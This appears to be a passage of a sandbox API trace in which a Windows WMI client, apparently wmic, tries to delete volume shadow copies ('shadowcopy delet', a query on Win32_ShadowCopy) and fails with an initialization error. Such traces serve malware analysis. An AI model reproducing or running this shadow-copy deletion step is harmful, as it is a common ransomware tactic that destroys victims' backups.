lstrlenA (lpString=" FROM ") returned 6 [0186.013] malloc (_Size=0xe) returned 0x88bb00 [0186.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe6377c, cbMultiByte=-1, lpWideCharStr=0x88bb00, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7 [0186.013] free (_Block=0x88bb00) [0186.013] malloc (_Size=0xc) returned 0x88bad0 [0186.013] lstrlenA (lpString="SELECT ") returned 7 [0186.013] malloc (_Size=0x10) returned 0x88bae8 [0186.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe63784, cbMultiByte=-1, lpWideCharStr=0x88bae8, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8 [0186.013] free (_Block=0x88bae8) [0186.013] malloc (_Size=0xc) returned 0x88ba40 [0186.013] SysStringLen (param_1="SELECT ") returned 0x7 [0186.013] SysStringLen (param_1="*") returned 0x1 [0186.013] malloc (_Size=0xc) returned 0x88bae8 [0186.013] SysStringLen (param_1="SELECT *") returned 0x8 [0186.013] SysStringLen (param_1=" FROM ") returned 0x6 [0186.013] malloc (_Size=0xc) returned 0x88b980 [0186.013] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0186.013] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0186.013] free (_Block=0x88bb78) [0186.013] free (_Block=0x88bae8) [0186.013] free (_Block=0x88ba40) [0186.014] free (_Block=0x88bad0) [0186.014] free (_Block=0x88b998) [0186.014] malloc (_Size=0xc) returned 0x88bb48 [0186.014] malloc (_Size=0xc) returned 0x88ba10 [0186.014] lstrlenA (lpString=" WHERE ") returned 7 [0186.014] malloc (_Size=0x10) returned 0x88bb78 [0186.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe637a8, cbMultiByte=-1, lpWideCharStr=0x88bb78, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0186.014] free (_Block=0x88bb78) [0186.014] malloc (_Size=0xc) returned 0x88bb60 [0186.014] SysStringLen (param_1=" WHERE ") returned 0x7 [0186.014] SysStringLen (param_1="ID = 'delet'") returned 0xc [0186.014] malloc (_Size=0xc) returned 0x88b998 [0186.014] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0186.014] SysStringLen (param_1=" WHERE ID = 'delet'") returned 0x13 [0186.014] free (_Block=0x88b980) [0186.014] free (_Block=0x88bb60) [0186.014] free (_Block=0x88ba10) [0186.014] free (_Block=0x88bb48) [0186.014] ??0CHString@@QAE@XZ () returned 0x69ba0c [0186.014] GetCurrentThreadId () returned 0x1838 [0186.014] CoCreateInstance (in: rclsid=0xe66a54*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66a64*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0xea855c | out: ppv=0xea855c*=0xa09cb0) returned 0x0 [0186.019] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0186.019] ??0CHString@@QAE@XZ () returned 0x69ba08 [0186.019] GetCurrentThreadId () returned 0x1838 [0186.019] malloc (_Size=0xc) returned 0x88bb00 [0186.019] malloc (_Size=0xc) returned 0x88bad0 [0186.019] malloc (_Size=0xc) returned 0x88bb48 [0186.019] malloc (_Size=0xc) returned 0x88ba10 [0186.019] malloc (_Size=0xc) returned 0x88bae8 [0186.019] SysStringLen (param_1="\\\\") returned 0x2 [0186.019] SysStringLen (param_1="NQDPDE") returned 0x6 [0186.019] malloc (_Size=0xc) returned 0x88ba40 [0186.019] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0186.019] SysStringLen (param_1="\\") returned 0x1 [0186.019] malloc (_Size=0xc) returned 0x88b9e0 [0186.019] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0186.019] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0186.019] free (_Block=0x88ba40) [0186.019] free (_Block=0x88bae8) [0186.019] free (_Block=0x88ba10) [0186.019] free (_Block=0x88bb48) [0186.020] free (_Block=0x88bad0) [0186.020] free (_Block=0x88bb00) [0186.020] malloc (_Size=0xc) returned 0x88bbc0 [0186.020] malloc (_Size=0xc) returned 0x88bbd8 [0186.020] malloc (_Size=0xc) returned 0x88bc08 [0186.020] WbemLocator:IWbemLocator:ConnectServer (in: This=0x9f2e50, strNetworkResource="\\\\NQDPDE\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xea8564 | out: ppNamespace=0xea8564*=0xa39118) returned 0x0 [0187.891] free (_Block=0x88bc08) [0187.891] free (_Block=0x88bbd8) [0187.891] free (_Block=0x88bbc0) [0187.891] CoSetProxyBlanket (pProxy=0xa39118, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0187.891] free (_Block=0x88b9e0) [0187.891] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0187.891] ??0CHString@@QAE@XZ () returned 0x69b9f0 [0187.891] GetCurrentThreadId () returned 0x1838 [0187.891] free (_Block=0x88bb30) [0187.891] malloc (_Size=0xc) returned 0x88bc08 [0187.891] ??0CHString@@QAE@XZ () returned 0x69b958 [0187.891] GetCurrentThreadId () returned 0x1838 [0187.891] CoCreateInstanceEx (in: Clsid=0xe66a34*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x69b940 | out: pResults=((pIID=0xe66a44*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0xa09280, hr=0x0))) returned 0x0 [0187.891] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0187.891] malloc (_Size=0xc) returned 0x88bb48 [0187.892] IWbemServices:ExecQuery (in: This=0xa39118, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID = 'delet'", lFlags=48, pCtx=0x0, ppEnum=0x69b9e4 | out: ppEnum=0x69b9e4*=0xa4af98) returned 0x0 [0187.897] free (_Block=0x88bb48) [0187.897] malloc (_Size=0xc) returned 0x88ba40 [0187.897] WbemContext:IWbemContext:SetValue (This=0xa09280, wszName="ExcludeSystemProperties", lFlags=0, pValue=0x69b990*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0 [0187.897] free (_Block=0x88ba40) [0187.897] CoSetProxyBlanket (pProxy=0xa4af98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0188.103] CoCreateInstance (in: rclsid=0xe66a94*(Data1=0xeac8a024, Data2=0x21e2, Data3=0x4523, Data4=([0]=0xad, [1]=0x73, [2]=0xa7, [3]=0x1a, [4]=0xa, [5]=0xa2, [6]=0xf5, [7]=0x6a)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66aa4*(Data1=0x81166f58, Data2=0xdd98, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x20, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x69b9ec | out: ppv=0x69b9ec*=0xa3d590) returned 0x0 [0188.561] WbemQuery:IWbemQuery:Parse (This=0xa3d590, pszLang="WQL", pszQuery="SELECT * FROM Win32_ShadowCopy WHERE ID = 'delet'", uFlags=0x0) returned 0x0 [0188.561] WbemQuery:IWbemQuery:GetAnalysis (in: This=0xa3d590, uAnalysisType=0x1, uFlags=0x0, pAnalysis=0x69b9d8 | out: pAnalysis=0x69b9d8) returned 0x0 [0188.561] wcsstr (_Str="Win32_ShadowCopy", _SubStr="Win32_DiskDrive") returned 0x0 [0188.561] WbemQuery:IWbemQuery:FreeMemory (This=0xa3d590, pMem=0xa3ba20) returned 0x0 [0188.561] WbemQuery:IUnknown:Release (This=0xa3d590) returned 0x0 [0188.561] IEnumWbemClassObject:Next (in: This=0xa4af98, lTimeout=-1, uCount=0x1, apObjects=0x69b9dc, puReturned=0x69b9c0 | out: apObjects=0x69b9dc*=0x0, puReturned=0x69b9c0*=0x0) returned 0x80041014 [0256.486] _CxxThrowException () [0256.491] IUnknown:Release (This=0xa4af98) returned 0x0 [0256.492] malloc (_Size=0x10) returned 0x88b920 [0256.492] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0256.492] free (_Block=0x88bc08) [0256.492] free (_Block=0x88b998) [0256.492] free (_Block=0x88bab8) [0256.493] free (_Block=0x88baa0) [0256.493] LoadStringW (in: hInstance=0x0, uID=0xb7f5, lpBuffer=0x69f2dc, cchBufferMax=1024 | out: lpBuffer="Node - %1\r\n") returned 0xb [0256.493] FormatMessageW (in: dwFlags=0x2500, lpSource=0x69f2dc, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x69f2c4, nSize=0x0, Arguments=0x69f2c8 | out: lpBuffer="䓸\x9f⛈\x88") returned 0xf [0256.493] malloc (_Size=0xc) returned 0x88bc08 [0256.493] LocalFree (hMem=0x9f44f8) returned 0x0 [0256.493] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Node - NQDPDE\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0256.493] malloc (_Size=0x10) returned 0x88b938 [0256.493] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Node - NQDPDE\r\n", cchWideChar=-1, lpMultiByteStr=0x88b938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Node - NQDPDE\r\n", lpUsedDefaultChar=0x0) returned 16 [0256.493] __iob_func () returned 0x76952608 [0256.493] fprintf (in: _File=0x76952648, _Format="%s" | out: _File=0x76952648) returned 15 [0257.436] __iob_func () returned 0x76952608 [0257.436] fflush (in: _File=0x76952648 | out: _File=0x76952648) returned 0 [0257.436] free (_Block=0x88b938) [0257.436] malloc (_Size=0xc) returned 0x88b9e0 [0257.436] ??0CHString@@QAE@XZ () returned 0x69fa80 [0257.436] ?Format@CHString@@QAAXPBGZZ () returned 0x88b62c [0257.436] malloc (_Size=0xc) returned 0x88b9b0 [0257.436] malloc (_Size=0xc) returned 0x88b9c8 [0257.436] SysStringLen (param_1="") returned 0x7 [0257.436] SysStringLen (param_1="0x80041014") returned 0x1d [0257.436] free (_Block=0x88b9e0) [0257.437] free (_Block=0x88b9b0) [0257.437] CoCreateInstance (in: rclsid=0xe66a14*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66a24*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xea857c | out: ppv=0xea857c*=0xa21b70) returned 0x0 [0257.438] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0xa21b70, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x69fa84 | out: MessageText=0x69fa84*="Initialization failure\r\n") returned 0x0 [0257.438] malloc (_Size=0xc) returned 0x88bb30 [0257.438] malloc (_Size=0xc) returned 0x88baa0 [0257.438] SysStringLen (param_1="0x80041014") returned 0x24 [0257.438] SysStringLen (param_1="") returned 0xd [0257.439] free (_Block=0x88b9c8) [0257.439] free (_Block=0x88bb30) [0257.439] malloc (_Size=0xc) returned 0x88b938 [0257.439] malloc (_Size=0xc) returned 0x88bad0 [0257.439] SysStringLen (param_1="0x80041014") returned 0x31 [0257.439] SysStringLen (param_1="Initialization failure\r\n") returned 0x18 [0257.439] free (_Block=0x88baa0) [0257.439] free (_Block=0x88b938) [0257.439] malloc (_Size=0xc) returned 0x88b938 [0257.439] malloc (_Size=0xc) returned 0x88b950 [0257.439] SysStringLen (param_1="0x80041014Initialization failure\r\n") returned 0x49 [0257.439] SysStringLen (param_1="") returned 0xe [0257.439] free (_Block=0x88bad0) [0257.439] free (_Block=0x88b938) [0257.439] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0xa21b70, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x69fa88 | out: MessageText=0x69fa88*="WMI") returned 0x0 [0257.439] malloc (_Size=0xc) returned 0x88b980 [0257.439] malloc (_Size=0xc) returned 0x88bb60 [0257.440] SysStringLen (param_1="0x80041014Initialization failure\r\n") returned 0x57 [0257.440] SysStringLen (param_1="") returned 0xe [0257.440] free (_Block=0x88b950) [0257.440] free (_Block=0x88b980) [0257.440] malloc (_Size=0xc) returned 0x88b9e0 [0257.440] malloc (_Size=0xc) returned 0x88b950 [0257.440] SysStringLen (param_1="0x80041014Initialization failure\r\n") returned 0x65 [0257.440] SysStringLen (param_1="WMI") returned 0x3 [0257.440] free (_Block=0x88bb60) [0257.440] free (_Block=0x88b9e0) [0257.440] malloc (_Size=0xc) returned 0x88b9e0 [0257.440] malloc (_Size=0xc) returned 0x88bb78 [0257.440] SysStringLen (param_1="0x80041014Initialization failure\r\nWMI") returned 0x68 [0257.440] SysStringLen (param_1="") returned 0xf [0257.440] free (_Block=0x88b950) [0257.440] free (_Block=0x88b9e0) [0257.440] lstrlenW (lpString="WMI") returned 3 [0257.440] lstrlenW (lpString="Wbem") returned 4 [0257.440] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0257.440] lstrlenW (lpString="WMI") returned 3 [0257.440] lstrlenW (lpString="WMI") returned 3 [0257.440] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0257.441] WbemStatusCodeText:IUnknown:Release (This=0xa21b70) returned 0x0 [0257.441] ??1CHString@@QAE@XZ () returned 0x1 [0257.441] malloc (_Size=0xc) returned 0x88baa0 [0257.441] malloc (_Size=0xc) returned 0x88b9e0 [0257.441] SysStringLen (param_1="0x80041014Initialization failure\r\nWMI") returned 0x77 [0257.441] SysStringLen (param_1="") returned 0x8 [0257.441] free (_Block=0x88bb78) [0257.441] free (_Block=0x88baa0) [0257.441] ??0CHString@@QAE@XZ () returned 0x69f9fc [0257.441] malloc (_Size=0xc) returned 0x88bbc0 [0257.441] malloc (_Size=0xc) returned 0x88bb18 [0257.441] SysStringLen (param_1="") returned 0x0 [0257.441] free (_Block=0x88bbc0) [0257.441] CoCreateInstance (in: rclsid=0xe66a14*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66a24*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xea857c | out: ppv=0xea857c*=0xa21af0) returned 0x0 [0257.441] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0xa21af0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x69fa00 | out: MessageText=0x69fa00*="Initialization failure\r\n") returned 0x0 [0257.441] free (_Block=0x88bb18) [0257.441] malloc (_Size=0xc) returned 0x88b938 [0257.441] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0xa21af0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x69fa04 | out: MessageText=0x69fa04*="WMI") returned 0x0 [0257.441] malloc (_Size=0xc) returned 0x88b950 [0257.442] lstrlenW (lpString="WMI") returned 3 [0257.442] lstrlenW (lpString="Wbem") returned 4 [0257.442] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0257.442] lstrlenW (lpString="WMI") returned 3 [0257.442] lstrlenW (lpString="WMI") returned 3 [0257.442] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0257.442] WbemStatusCodeText:IUnknown:Release (This=0xa21af0) returned 0x0 [0257.442] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0257.442] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x69f25c, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0257.442] FormatMessageW (in: dwFlags=0x2500, lpSource=0x69f25c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x69f244, nSize=0x0, Arguments=0x69f248 | out: lpBuffer="쎨\x9f獴 Ȃ") returned 0x2e [0257.442] malloc (_Size=0xc) returned 0x88bb00 [0257.442] LocalFree (hMem=0x9fc3a8) returned 0x0 [0257.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0257.442] malloc (_Size=0x2f) returned 0x88c358 [0257.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x88c358, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0257.442] __iob_func () returned 0x76952608 [0257.442] fprintf (in: _File=0x76952648, _Format="%s" | out: _File=0x76952648) returned 46 [0258.077] __iob_func () returned 0x76952608 [0258.077] fflush (in: _File=0x76952648 | out: _File=0x76952648) returned 0 [0258.078] free (_Block=0x88c358) [0258.078] free (_Block=0x88bb00) [0258.078] free (_Block=0x88b950) [0258.078] free (_Block=0x88b938) [0258.078] malloc (_Size=0xc) returned 0x88ba10 [0258.078] SysStringLen (param_1="") returned 0x17 [0258.078] SysStringLen (param_1="0x80041014Initialization failure\r\nWMI") returned 0x7f [0258.078] free (_Block=0x88bbf0) [0258.078] free (_Block=0x88b9e0) [0258.078] free (_Block=0x88bc08) [0258.078] ??0CHString@@QAE@PBG@Z () returned 0x69fad8 [0258.078] ??YCHString@@QAEABV0@PBG@Z () returned 0x69fad8 [0258.078] GetCurrentThreadId () returned 0x1838 [0258.078] ??1CHString@@QAE@XZ () returned 0x1 [0258.078] malloc (_Size=0xc) returned 0x88bbd8 [0258.078] malloc (_Size=0xc) returned 0x88baa0 [0258.078] SysStringLen (param_1="0x80041014Initialization failure\r\nWMI") returned 0x96 [0258.078] SysStringLen (param_1="") returned 0xa [0258.078] free (_Block=0x88ba10) [0258.078] free (_Block=0x88bbd8) [0258.078] ??0CHString@@QAE@XZ () returned 0x69fad0 [0258.078] malloc (_Size=0xc) returned 0x88bc08 [0258.079] memcpy_s (in: _Destination=0x69fa84, _DestinationSize=0xe, _Source=0xa308bc, _SourceSize=0xc | out: _Destination=0x69fa84) returned 0x0 [0258.079] lstrlenW (lpString="&") returned 1 [0258.079] lstrlenW (lpString="&") returned 5 [0258.079] lstrlenW (lpString="<") returned 1 [0258.079] lstrlenW (lpString="<") returned 4 [0258.079] lstrlenW (lpString=">") returned 1 [0258.079] lstrlenW (lpString=">") returned 4 [0258.079] lstrlenW (lpString="'") returned 1 [0258.079] lstrlenW (lpString="'") returned 6 [0258.079] lstrlenW (lpString="\"") returned 1 [0258.079] lstrlenW (lpString=""") returned 6 [0258.079] malloc (_Size=0xc) returned 0x88bb30 [0258.079] free (_Block=0x88bc08) [0258.079] ?Format@CHString@@QAAXPBGZZ () returned 0x4e30054 [0258.080] malloc (_Size=0xc) returned 0x88b968 [0258.080] free (_Block=0x88bb90) [0258.080] free (_Block=0x88bb30) [0258.080] ??1CHString@@QAE@XZ () returned 0x1 [0258.080] ??0CHString@@QAE@XZ () returned 0x69facc [0258.080] malloc (_Size=0xc) returned 0x88bab8 [0258.080] malloc (_Size=0xc) returned 0x88bb78 [0258.080] malloc (_Size=0x30) returned 0x88c358 [0258.080] memcpy_s (in: _Destination=0x88c358, _DestinationSize=0x2e, _Source=0xa26afc, _SourceSize=0x24 | out: _Destination=0x88c358) returned 0x0 [0258.080] lstrlenW (lpString="&") returned 1 [0258.080] lstrlenW (lpString="&") returned 5 [0258.080] lstrlenW (lpString="<") returned 1 [0258.080] lstrlenW (lpString="<") returned 4 [0258.080] lstrlenW (lpString=">") returned 1 [0258.080] lstrlenW (lpString=">") returned 4 [0258.080] lstrlenW (lpString="'") returned 1 [0258.081] lstrlenW (lpString="'") returned 6 [0258.081] lstrlenW (lpString="\"") returned 1 [0258.081] lstrlenW (lpString=""") returned 6 [0258.081] malloc (_Size=0xc) returned 0x88bb90 [0258.081] free (_Block=0x88bb78) [0258.081] free (_Block=0x88c358) [0258.081] ?Format@CHString@@QAAXPBGZZ () returned 0x88dd4c [0258.081] malloc (_Size=0xc) returned 0x88ba10 [0258.081] malloc (_Size=0xc) returned 0x88bbf0 [0258.081] SysStringLen (param_1="") returned 0x9 [0258.081] SysStringLen (param_1=" shadowcopy delet") returned 0x2d [0258.081] free (_Block=0x88bab8) [0258.081] free (_Block=0x88ba10) [0258.081] ??0CHString@@QAE@XZ () returned 0x69fa90 [0258.081] malloc (_Size=0xc) returned 0x88bbc0 [0258.081] ??0CHString@@QAE@XZ () returned 0x69fa44 [0258.081] malloc (_Size=0xc) returned 0x88bb48 [0258.081] malloc (_Size=0x4) returned 0x88c358 [0258.081] memmove_s (in: _Destination=0x88c358, _DestinationSize=0x4, _Source=0x8826e0, _SourceSize=0x4 | out: _Destination=0x88c358) returned 0x0 [0258.081] malloc (_Size=0xc) returned 0x88bab8 [0258.081] memcpy_s (in: _Destination=0x69f9e0, _DestinationSize=0xe, _Source=0xa4a1e4, _SourceSize=0xc | out: _Destination=0x69f9e0) returned 0x0 [0258.081] lstrlenW (lpString="&") returned 1 [0258.081] lstrlenW (lpString="&") returned 5 [0258.081] lstrlenW (lpString="<") returned 1 [0258.081] lstrlenW (lpString="<") returned 4 [0258.081] lstrlenW (lpString=">") returned 1 [0258.081] lstrlenW (lpString=">") returned 4 [0258.082] lstrlenW (lpString="'") returned 1 [0258.082] lstrlenW (lpString="'") returned 6 [0258.082] lstrlenW (lpString="\"") returned 1 [0258.082] lstrlenW (lpString=""") returned 6 [0258.082] malloc (_Size=0xc) returned 0x88bae8 [0258.082] free (_Block=0x88bab8) [0258.082] ?Format@CHString@@QAAXPBGZZ () returned 0x88bd2c [0258.082] malloc (_Size=0xc) returned 0x88bab8 [0258.082] malloc (_Size=0xc) returned 0x88bb60 [0258.082] SysStringLen (param_1="") returned 0xa [0258.082] SysStringLen (param_1="NQDPDE") returned 0x13 [0258.082] free (_Block=0x88bb48) [0258.082] free (_Block=0x88bab8) [0258.082] malloc (_Size=0xc) returned 0x88bb30 [0258.082] malloc (_Size=0xc) returned 0x88bb00 [0258.082] SysStringLen (param_1="NQDPDE") returned 0x1d [0258.082] SysStringLen (param_1="") returned 0xb [0258.082] free (_Block=0x88bb60) [0258.082] free (_Block=0x88bb30) [0258.082] free (_Block=0x88bae8) [0258.082] free (_Block=0x88c358) [0258.082] ??1CHString@@QAE@XZ () returned 0x1 [0258.082] malloc (_Size=0xc) returned 0x88b980 [0258.082] SysStringLen (param_1="") returned 0x17 [0258.082] SysStringLen (param_1="NQDPDE") returned 0x28 [0258.083] free (_Block=0x88bbc0) [0258.083] lstrlenW (lpString="LIST") returned 4 [0258.083] lstrlenW (lpString="GET") returned 3 [0258.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1 [0258.083] malloc (_Size=0xc) returned 0x88b938 [0258.083] malloc (_Size=0xc) returned 0x88bb30 [0258.083] SysStringLen (param_1="NQDPDE") returned 0x3f [0258.083] SysStringLen (param_1="") returned 0x18 [0258.083] free (_Block=0x88b980) [0258.083] free (_Block=0x88b938) [0258.083] free (_Block=0x88bb00) [0258.083] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0258.083] malloc (_Size=0xc) returned 0x88b9b0 [0258.083] SysStringLen (param_1=" shadowcopy delet") returned 0x36 [0258.083] SysStringLen (param_1="NQDPDE") returned 0x57 [0258.083] free (_Block=0x88bbf0) [0258.083] ??0CHString@@QAE@XZ () returned 0x69fa78 [0258.083] malloc (_Size=0xc) returned 0x88bbc0 [0258.083] malloc (_Size=0xc) returned 0x88b938 [0258.083] malloc (_Size=0xc) returned 0x88ba10 [0258.083] malloc (_Size=0xc) returned 0x88b9c8 [0258.084] malloc (_Size=0xc) returned 0x88b980 [0258.084] malloc (_Size=0xc) returned 0x88bab8 [0258.084] malloc (_Size=0xc) returned 0x88bbd8 [0258.084] malloc (_Size=0xc) returned 0x88b9e0 [0258.084] memcpy_s (in: _Destination=0x69f9f4, _DestinationSize=0xe, _Source=0xa4a0a4, _SourceSize=0xc | out: _Destination=0x69f9f4) returned 0x0 [0258.084] lstrlenW (lpString="&") returned 1 [0258.084] lstrlenW (lpString="&") returned 5 [0258.084] lstrlenW (lpString="<") returned 1 [0258.084] lstrlenW (lpString="<") returned 4 [0258.084] lstrlenW (lpString=">") returned 1 [0258.084] lstrlenW (lpString=">") returned 4 [0258.084] lstrlenW (lpString="'") returned 1 [0258.084] lstrlenW (lpString="'") returned 6 [0258.084] lstrlenW (lpString="\"") returned 1 [0258.084] lstrlenW (lpString=""") returned 6 [0258.084] malloc (_Size=0xc) returned 0x88bbf0 [0258.084] free (_Block=0x88b9e0) [0258.084] malloc (_Size=0xc) returned 0x88bb60 [0258.084] memcpy_s (in: _Destination=0x69f9f4, _DestinationSize=0xe, _Source=0xa4a0a4, _SourceSize=0xc | out: _Destination=0x69f9f4) returned 0x0 [0258.084] lstrlenW (lpString="&") returned 1 [0258.084] lstrlenW (lpString="&") returned 5 [0258.084] lstrlenW (lpString="<") returned 1 [0258.084] lstrlenW (lpString="<") returned 4 [0258.084] lstrlenW (lpString=">") returned 1 [0258.084] lstrlenW (lpString=">") returned 4 [0258.084] lstrlenW (lpString="'") returned 1 [0258.084] lstrlenW (lpString="'") returned 6 [0258.084] lstrlenW (lpString="\"") returned 1 [0258.084] lstrlenW (lpString=""") returned 6 [0258.084] malloc (_Size=0xc) returned 0x88bad0 [0258.085] free (_Block=0x88bb60) [0258.085] malloc (_Size=0xc) returned 0x88b950 [0258.085] memcpy_s (in: _Destination=0x69f9f4, _DestinationSize=0xe, _Source=0xa4a0a4, _SourceSize=0x6 | out: _Destination=0x69f9f4) returned 0x0 [0258.085] lstrlenW (lpString="&") returned 1 [0258.085] lstrlenW (lpString="&") returned 5 [0258.085] lstrlenW (lpString="<") returned 1 [0258.085] lstrlenW (lpString="<") returned 4 [0258.085] lstrlenW (lpString=">") returned 1 [0258.085] lstrlenW (lpString=">") returned 4 [0258.085] lstrlenW (lpString="'") returned 1 [0258.085] lstrlenW (lpString="'") returned 6 [0258.085] lstrlenW (lpString="\"") returned 1 [0258.085] lstrlenW (lpString=""") returned 6 [0258.085] malloc (_Size=0xc) returned 0x88bc08 [0258.085] free (_Block=0x88b950) [0258.085] malloc (_Size=0xc) returned 0x88bb48 [0258.085] memcpy_s (in: _Destination=0x69f9f4, _DestinationSize=0xe, _Source=0xa4a0a4, _SourceSize=0x6 | out: _Destination=0x69f9f4) returned 0x0 [0258.085] lstrlenW (lpString="&") returned 1 [0258.085] lstrlenW (lpString="&") returned 5 [0258.085] lstrlenW (lpString="<") returned 1 [0258.085] lstrlenW (lpString="<") returned 4 [0258.085] lstrlenW (lpString=">") returned 1 [0258.085] lstrlenW (lpString=">") returned 4 [0258.085] lstrlenW (lpString="'") returned 1 [0258.085] lstrlenW (lpString="'") returned 6 [0258.085] lstrlenW (lpString="\"") returned 1 [0258.085] lstrlenW (lpString=""") returned 6 [0258.085] malloc (_Size=0xc) returned 0x88b998 [0258.085] free (_Block=0x88bb48) [0258.085] malloc (_Size=0xc) returned 0x88ba28 [0258.086] malloc (_Size=0x20) returned 0x88c358 [0258.086] memcpy_s (in: _Destination=0x88c358, _DestinationSize=0x1e, _Source=0xa4a0a4, _SourceSize=0x14 | out: _Destination=0x88c358) returned 0x0 [0258.086] lstrlenW (lpString="&") returned 1 [0258.086] 